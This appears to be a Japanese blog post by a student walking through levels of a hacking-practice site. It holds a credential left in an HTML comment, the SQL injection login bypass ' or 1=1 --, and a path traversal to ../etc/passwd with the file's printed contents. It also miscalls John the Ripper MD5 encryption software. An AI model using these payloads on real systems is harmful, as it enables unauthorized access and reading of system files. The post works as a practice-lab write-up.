家にいても暇だからハッキング検定を受けてみました!!中3でw
http://hackme.netfire.jp/star←にハッキング検定できるからやってみ!
まずレベル1だが右クリックなど全て不正行為は不可能!
ソースコードと言うものをだしてきて
ソースコードを見ると63行目に
<!-- id: admin
--> <!-- pass: nimdadmin --> |
と書いてあるのが分かるよって ID:adminPASS:nimdadmin それを入力するとレベル1をクリアーできる 次にレベル2 IDはLV1よりadminとなるのが分かる。 ここで注目すべきは「’」(シングルクォート)を入力した時のエラーでござる!Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near "'" と出てくるのが分かる。 よって何年か前に流行ったSQLインジェクションの可能性が高まったので その脆弱性を利用してパスワードは「' or 1=1 --」と判明 よってID:admin PASS:' or 1=1 -- または適当に' or 2=2 --でもできる これでレベル2は クリアー^-^ 次はレベル3 ここからはハッキングの達人だねw ここではjohn the ripperというMD5の暗号化ソフトが必要なる。 注目すべきはURLの http://hackme.netfire.jp/Lv3/login?page=template/login.html の=以下を変更して../etc/passwdに変更… http://hackme.netfire.jp/Lv3/login?page=../etc/passwd でアクセスすると root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:101:106::/var/run/dbus:/bin/false
clamav:x:100:108::/var/lib/clamav:/bin/false
avahi:x:103:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:105:117::/home/saned:/bin/false
postgres:x:104:114:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ftp:x:109:65534::/home/ftp:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/falseと出てくる |